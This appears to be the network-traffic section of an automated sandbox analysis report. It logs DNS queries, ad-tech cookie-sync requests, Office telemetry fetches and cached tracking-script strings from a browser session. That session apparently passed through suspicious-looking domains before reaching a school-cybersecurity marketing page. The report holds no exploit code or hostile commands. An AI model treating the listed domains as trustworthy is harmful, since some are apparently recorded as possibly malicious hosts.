Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /cookie-sync?p=adroll&uid=ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI&gdpr=0&gdpr_consent=&us_privacy=1--- HTTP/1.1Host: sync.outbrain.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /ups/55980/sync?_origin=1&uid=ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI&gdpr=0&gdpr_consent=BOOla_OOOla_OA2ABBENAkwAAAAXyACAAyAIIA HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTMzMDYmdGw9MTI5NjAw&piggybackCookie=ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI&gdpr=0&gdpr_consent=BOOoKswOOoKswA2ABBENAkwAAAAXyACACYAIIA HTTP/1.1Host: image2.pubmatic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: KRTBCOOKIE_10=22808-ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI&KRTB&22883-ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI&KRTB&23504-ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI&KRTB&23615-ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI; PugT=1728897194
Source: global trafficHTTP traffic detected: GET /sg/adroll-network/1/rtb-h?taboola_hm=ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI HTTP/1.1Host: sync.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /xuid?mid=4714&xuid=ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI&dongle=c85e HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /setuid?entity=172&code=ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /api/v2/client/ws?v=7&site_id=1110137 HTTP/1.1Host: ws.hotjar.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://get.managedmethods.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Sec-WebSocket-Key: kOVprazzzjK4DnyQpVQGvQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Source: global trafficHTTP traffic detected: GET /ups/55980/sync?_origin=1&uid=ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI&gdpr=0&gdpr_consent=BOOla_OOOla_OA2ABBENAkwAAAAXyACAAyAIIA&verify=true HTTP/1.1Host: ups.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A3=d=AQABBKvgDGcCEGcXCxC8BJQdyVL4UoFdflEFEgEBAQEyDmcWZ9xA0iMA_eMAAA&S=AQAAArB1NkzuwprO3ztoAj_24n4
Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /xuid?ld=1&mid=4714&xuid=ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI&dongle=c85e&gdpr=0&cmp_cs=&us_privacy= HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tluidp=2207872421924619544908; tluid=2207872421924619544908
Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /bounce?%2Fsetuid%3Fentity%3D172%26code%3DZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI HTTP/1.1Host: ib.adnxs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://get.managedmethods.com/k12-cybersecurity-safety-k12dive?gad_source=5Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XANDR_PANID=km49EgQ9-GYpbBwjNN9ZdDA7eqehd4iV-jjolKDSxOzp9xK2-EK015OPFB0R0O9AdlunXpA3wiDyvUbFEkCYAdzqWfAYYzC-hDgwjeV1SMM.; receive-cookie-deprecation=1; uuid2=4305931231207897773
Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /xuid?ld=1&mid=4714&xuid=ZTQ2NWY2YjE4ZWEzMzMzNDFjYTg3ZTNkMmU4MTIxYmI&dongle=c85e&gdpr=0&cmp_cs=&us_privacy= HTTP/1.1Host: eb2.3lift.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tluid=2207872421924619544908
Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: chromecache_419.2.drString found in binary or memory: "tags":[{"function":"__awct","metadata":["map"],"once_per_event":true,"vtp_enableNewCustomerReporting":false,"vtp_enableConversionLinker":true,"vtp_enableProductReporting":false,"vtp_conversionCookiePrefix":"_gcl","vtp_enableShippingData":false,"vtp_conversionId":"927141988","vtp_conversionLabel":"Z6OoCKu1uJIBEOSgjLoD","vtp_rdp":false,"vtp_url":["macro",3],"vtp_enableProductReportingCheckbox":true,"vtp_enableNewCustomerReportingCheckbox":true,"vtp_enableEnhancedConversionsCheckbox":false,"vtp_enableRdpCheckbox":true,"vtp_enableTransportUrl":false,"vtp_enableCustomParams":false,"tag_id":1},{"function":"__gclidw","metadata":["map"],"once_per_event":true,"vtp_enableCrossDomain":false,"vtp_enableUrlPassthrough":false,"vtp_enableCookieOverrides":false,"vtp_enableCrossDomainFeature":true,"tag_id":2},{"function":"__ua","metadata":["map"],"once_per_event":true,"vtp_overrideGaSettings":false,"vtp_trackType":"TRACK_PAGEVIEW","vtp_gaSettings":["macro",4],"vtp_enableRecaptchaOption":false,"vtp_enableUaRlsa":false,"vtp_enableUseInternalVersion":false,"vtp_enableFirebaseCampaignData":true,"vtp_enableGA4Schema":true,"tag_id":4},{"function":"__bzi","metadata":["map"],"once_per_event":true,"vtp_id":"48411","tag_id":6},{"function":"__googtag","metadata":["map"],"once_per_event":true,"vtp_tagId":"G-KLDE7YGZXK","vtp_configSettingsTable":["list",["map","parameter","send_page_view","parameterValue","true"]],"tag_id":46},{"function":"__cvt_10608771_57","metadata":["map"],"once_per_event":true,"vtp_siteId":"759fd941","tag_id":58},{"function":"__gaawe","metadata":["map"],"once_per_event":true,"vtp_sendEcommerceData":false,"vtp_eventSettingsTable":["list",["map","parameter",["macro",0],"parameterValue",["macro",0]],["map","parameter",["macro",5],"parameterValue",["macro",5]],["map","parameter",["macro",2],"parameterValue",["macro",2]]],"vtp_eventName":"hs_cta_conversion","vtp_measurementIdOverride":"G-KLDE7YGZXK","vtp_enableUserProperties":true,"vtp_enableMoreSettingsOption":true,"vtp_enableEuid":true,"vtp_migratedToV2":true,"vtp_demoV2":false,"tag_id":60},{"function":"__cvt_10608771_61","metadata":["map"],"once_per_event":true,"vtp_enableFirstPartyCookies":true,"vtp_dataProcessingOptions":false,"vtp_eventType":"PageVisit","vtp_id":"a2_dy5o8mn2d6oc","vtp_advancedMatching":false,"vtp_productInputType":"entryManual","tag_id":62},{"function":"__cvt_10608771_61","metadata":["map"],"once_per_event":true,"vtp_enableFirstPartyCookies":true,"vtp_dataProcessingOptions":false,"vtp_eventType":"Lead","vtp_id":"a2_dy5o8mn2d6oc","vtp_advancedMatching":false,"vtp_productInputType":"entryManual","tag_id":63},{"function":"__fsl","vtp_waitForTagsTimeout":"2000","vtp_uniqueTriggerId":"10608771_55","tag_id":64},{"function":"__html","once_per_event":true,"vtp_html":"\n\u003Cscript async data-gtmsrc=\"https:\/\/www.googletagmanager.com\/gtag\/js?id=AW-927141988\" type=\"text\/gtmscript\"\u003E\u003C\/script\u003E\n\u003Cscript type=\"text\/gtmscript\"\u003Ewindow.dataLayer=window.dataLayer||
Source: chromecache_210.2.dr, chromecache_204.2.drString found in binary or memory: Math.round(q);u["gtm.videoElapsedTime"]=Math.round(f);u["gtm.videoPercent"]=r;u["gtm.videoVisible"]=t;return u},kk:function(){e=Ab()},sd:function(){d()}}};var hc=la(["data-gtm-yt-inspected-"]),YC=["www.youtube.com","www.youtube-nocookie.com"],ZC,$C=!1; equals www.youtube.com (Youtube)
Source: chromecache_311.2.dr, chromecache_331.2.dr, chromecache_282.2.dr, chromecache_405.2.drString found in binary or memory: c?"runIfCanceled":"runIfUncanceled",[]);if(!g.length)return!0;var k=EA(a,c,e);V(121);if(k["gtm.elementUrl"]==="https://www.facebook.com/tr/")return V(122),!0;if(d&&f){for(var m=Lb(b,g.length),n=0;n<g.length;++n)g[n](k,m);return m.done}for(var p=0;p<g.length;++p)g[p](k,function(){});return!0},HA=function(){var a=[],b=function(c){return qb(a,function(d){return d.form===c})};return{store:function(c,d){var e=b(c);e?e.button=d:a.push({form:c,button:d})},get:function(c){var d=b(c);return d?d.button:null}}}, equals www.facebook.com (Facebook)
Source: chromecache_210.2.dr, chromecache_204.2.drString found in binary or memory: if(!(e||f||g||k.length||m.length))return;var p={nh:e,lh:f,mh:g,Xh:k,Yh:m,Ie:n,Eb:b},q=C.YT;if(q)return q.ready&&q.ready(d),b;var r=C.onYouTubeIframeAPIReady;C.onYouTubeIframeAPIReady=function(){r&&r();d()};F(function(){for(var t=E.getElementsByTagName("script"),v=t.length,u=0;u<v;u++){var w=t[u].getAttribute("src");if(iD(w,"iframe_api")||iD(w,"player_api"))return b}for(var x=E.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!$C&&gD(x[A],p.Ie))return xc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
Source: chromecache_311.2.dr, chromecache_331.2.dr, chromecache_282.2.dr, chromecache_232.2.dr, chromecache_405.2.dr, chromecache_419.2.drString found in binary or memory: return b}WC.F="internal.enableAutoEventOnTimer";var hc=la(["data-gtm-yt-inspected-"]),YC=["www.youtube.com","www.youtube-nocookie.com"],ZC,$C=!1; equals www.youtube.com (Youtube)
Source: chromecache_276.2.drString found in binary or memory: return function(a,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var b=f.getFbeventsModules("signalsFBEventsGetTier"),c=d();function d(){try{if(a.trustedTypes&&a.trustedTypes.createPolicy){var b=a.trustedTypes;return b.createPolicy("facebook.com/signals/iwl",{createScriptURL:function(a){var b=new URL(a);b=b.hostname.endsWith(".facebook.com")&&b.pathname=="/signals/iwl.js";if(!b)throw new Error("Disallowed script URL");return a}})}}catch(a){}return null}e.exports=function(a,d){d=b(d);d=d==null?"www.facebook.com":"www."+d+".facebook.com";d="https://"+d+"/signals/iwl.js?pixel_id="+a;if(c!=null)return c.createScriptURL(d);else return d}})();return e.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
Source: chromecache_276.2.drString found in binary or memory: return function(f,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var a=/^https:\/\/www\.([A-Za-z0-9\.]+)\.facebook\.com\/tr\/?$/,b=["https://www.facebook.com/tr","https://www.facebook.com/tr/"];e.exports=function(c){if(b.indexOf(c)!==-1)return null;var d=a.exec(c);if(d==null)throw new Error("Malformed tier: "+c);return d[1]}})();return e.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
Source: chromecache_276.2.drString found in binary or memory: return function(f,g,h,i){var j={exports:{}};j.exports;(function(){"use strict";var a={ENDPOINT:"https://www.facebook.com/tr/",INSTAGRAM_TRIGGER_ATTRIBUTION:"https://www.instagram.com/tr/",AEM_ENDPOINT:"https://www.facebook.com/.well-known/aggregated-event-measurement/",GPS_ENDPOINT:"https://www.facebook.com/privacy_sandbox/pixel/register/trigger/",TOPICS_API_ENDPOINT:"https://www.facebook.com/privacy_sandbox/topics/registration/"};j.exports=a})();return j.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
Source: chromecache_311.2.dr, chromecache_331.2.dr, chromecache_282.2.dr, chromecache_232.2.dr, chromecache_405.2.dr, chromecache_419.2.drString found in binary or memory: var kC=function(a,b,c,d,e){var f=bA("fsl",c?"nv.mwt":"mwt",0),g;g=c?bA("fsl","nv.ids",[]):bA("fsl","ids",[]);if(!g.length)return!0;var k=gA(a,"gtm.formSubmit",g),m=a.action;m&&m.tagName&&(m=a.cloneNode(!1).action);V(121);if(m==="https://www.facebook.com/tr/")return V(122),!0;k["gtm.elementUrl"]=m;k["gtm.formCanceled"]=c;a.getAttribute("name")!=null&&(k["gtm.interactedFormName"]=a.getAttribute("name"));e&&(k["gtm.formSubmitElement"]=e,k["gtm.formSubmitElementText"]=e.value);if(d&&f){if(!Oy(k,Qy(b, equals www.facebook.com (Facebook)
Source: global trafficDNS traffic detected: DNS query: hy.markkasmick.click
Source: global trafficDNS traffic detected: DNS query: p.jwalf.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: my7recovery.blogspot.com
Source: global trafficDNS traffic detected: DNS query: ald.my.id
Source: global trafficDNS traffic detected: DNS query: blogger.googleusercontent.com
Source: global trafficDNS traffic detected: DNS query: s10.histats.com
Source: global trafficDNS traffic detected: DNS query: cdn.rawgit.com
Source: global trafficDNS traffic detected: DNS query: s4.histats.com
Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: e.dtscout.com
Source: global trafficDNS traffic detected: DNS query: t.dtscout.com
Source: global trafficDNS traffic detected: DNS query: pxdrop.lijit.com
Source: global trafficDNS traffic detected: DNS query: pd.sharethis.com
Source: global trafficDNS traffic detected: DNS query: cdn.tynt.com
Source: global trafficDNS traffic detected: DNS query: ic.tynt.com
Source: global trafficDNS traffic detected: DNS query: t.sharethis.com
Source: global trafficDNS traffic detected: DNS query: de.tynt.com
Source: global trafficDNS traffic detected: DNS query: tags.crwdcntrl.net
Source: global trafficDNS traffic detected: DNS query: t.dtscdn.com
Source: global trafficDNS traffic detected: DNS query: pixel.onaudience.com
Source: global trafficDNS traffic detected: DNS query: fundingchoicesmessages.google.com
Source: global trafficDNS traffic detected: DNS query: cdn-tc.33across.com
Source: global trafficDNS traffic detected: DNS query: rc.rlcdn.com
Source: global trafficDNS traffic detected: DNS query: i.simpli.fi
Source: global trafficDNS traffic detected: DNS query: match.adsrvr.org
Source: global trafficDNS traffic detected: DNS query: pippio.com
Source: global trafficDNS traffic detected: DNS query: us-u.openx.net
Source: global trafficDNS traffic detected: DNS query: p.adsymptotic.com
Source: global trafficDNS traffic detected: DNS query: idsync.rlcdn.com
Source: global trafficDNS traffic detected: DNS query: bcp.crwdcntrl.net
Source: global trafficDNS traffic detected: DNS query: ps.eyeota.net
Source: global trafficDNS traffic detected: DNS query: ml314.com
Source: global trafficDNS traffic detected: DNS query: tags.bluekai.com
Source: global trafficDNS traffic detected: DNS query: sync.sharethis.com
Source: global trafficDNS traffic detected: DNS query: get.managedmethods.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: 7052064.fs1.hubspotusercontent-na1.net
Source: global trafficDNS traffic detected: DNS query: www.w3schools.com
Source: global trafficDNS traffic detected: DNS query: static.hsappstatic.net
Source: global trafficDNS traffic detected: DNS query: static.hotjar.com
Source: global trafficDNS traffic detected: DNS query: script.hotjar.com
Source: global trafficDNS traffic detected: DNS query: www.youtube.com
Source: global trafficDNS traffic detected: DNS query: js.hubspot.com
Source: global trafficDNS traffic detected: DNS query: js.usemessages.com
Source: global trafficDNS traffic detected: DNS query: js.hs-analytics.net
Source: global trafficDNS traffic detected: DNS query: js.hsleadflows.net
Source: global trafficDNS traffic detected: DNS query: js.hsadspixel.net
Source: global trafficDNS traffic detected: DNS query: js.hs-banner.com
Source: global trafficDNS traffic detected: DNS query: js.hscollectedforms.net
Source: global trafficDNS traffic detected: DNS query: app.hubspot.com
Source: global trafficDNS traffic detected: DNS query: forms-na1.hsforms.com
Source: global trafficDNS traffic detected: DNS query: cta-service-cms2.hubspot.com
Source: global trafficDNS traffic detected: DNS query: ws.hotjar.com
Source: global trafficDNS traffic detected: DNS query: content.hotjar.io
Source: global trafficDNS traffic detected: DNS query: forms.hscollectedforms.net
Source: global trafficDNS traffic detected: DNS query: perf-na1.hsforms.com
Source: global trafficDNS traffic detected: DNS query: forms.hsforms.com
Source: global trafficDNS traffic detected: DNS query: track.hubspot.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: forms.hubspot.com
Source: global trafficDNS traffic detected: DNS query: api.hubapi.com
Source: global trafficDNS traffic detected: DNS query: s.adroll.com
Source: global trafficDNS traffic detected: DNS query: connect.facebook.net
Source: global trafficDNS traffic detected: DNS query: snap.licdn.com
Source: global trafficDNS traffic detected: DNS query: tools.luckyorange.com
Source: global trafficDNS traffic detected: DNS query: www.redditstatic.com
Source: global trafficDNS traffic detected: DNS query: js.hs-scripts.com
Source: global trafficDNS traffic detected: DNS query: adservice.google.com
Source: global trafficDNS traffic detected: DNS query: px.ads.linkedin.com
Source: global trafficDNS traffic detected: DNS query: pixel-config.reddit.com
Source: global trafficDNS traffic detected: DNS query: d.adroll.com
Source: global trafficDNS traffic detected: DNS query: alb.reddit.com
Source: global trafficDNS traffic detected: DNS query: td.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: analytics.google.com
Source: global trafficDNS traffic detected: DNS query: settings.luckyorange.com
Source: global trafficDNS traffic detected: DNS query: stats.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: www.linkedin.com
Source: global trafficDNS traffic detected: DNS query: x.adroll.com
Source: global trafficDNS traffic detected: DNS query: www.facebook.com
Source: global trafficDNS traffic detected: DNS query: x.bidswitch.net
Source: global trafficDNS traffic detected: DNS query: pixel.tapad.com
Source: global trafficDNS traffic detected: DNS query: cm.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: dsum-sec.casalemedia.com
Source: global trafficDNS traffic detected: DNS query: pixel.rubiconproject.com
Source: global trafficDNS traffic detected: DNS query: sync.outbrain.com
Source: global trafficDNS traffic detected: DNS query: image2.pubmatic.com
Source: global trafficDNS traffic detected: DNS query: ups.analytics.yahoo.com
Source: global trafficDNS traffic detected: DNS query: sync.taboola.com
Source: global trafficDNS traffic detected: DNS query: eb2.3lift.com
Source: global trafficDNS traffic detected: DNS query: ib.adnxs.com
Source: global trafficDNS traffic detected: DNS query: 2500081.fs1.hubspotusercontent-na1.net
Source: global trafficDNS traffic detected: DNS query: secure.adnxs.com
Source: unknownHTTP traffic detected: POST /el/AGSKWxVAzDHl_-4j7DcCm6sYAbWFlq_mBsm_FyV6OOGNZcwDj1f1wVJJMJDPrG-A9X0dMOs9_cpdPTFlXO6fLqszIBQTCWLwCy0Y8TKsIXcvGA8rLOoYiWyUoC1SpBcoK0frF33KE48rcg== HTTP/1.1Host: fundingchoicesmessages.google.comConnection: keep-aliveContent-Length: 247sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: text/plainAccept: */*Origin: https://ald.my.idX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ald.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Mon, 14 Oct 2024 09:12:29 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: chromecache_265.2.dr, chromecache_305.2.drString found in binary or memory: http://a.adroll.com
Source: chromecache_366.2.drString found in binary or memory: http://daneden.me/animate
Source: chromecache_366.2.drString found in binary or memory: http://fontawesome.io
Source: chromecache_366.2.drString found in binary or memory: http://fontawesome.io/license
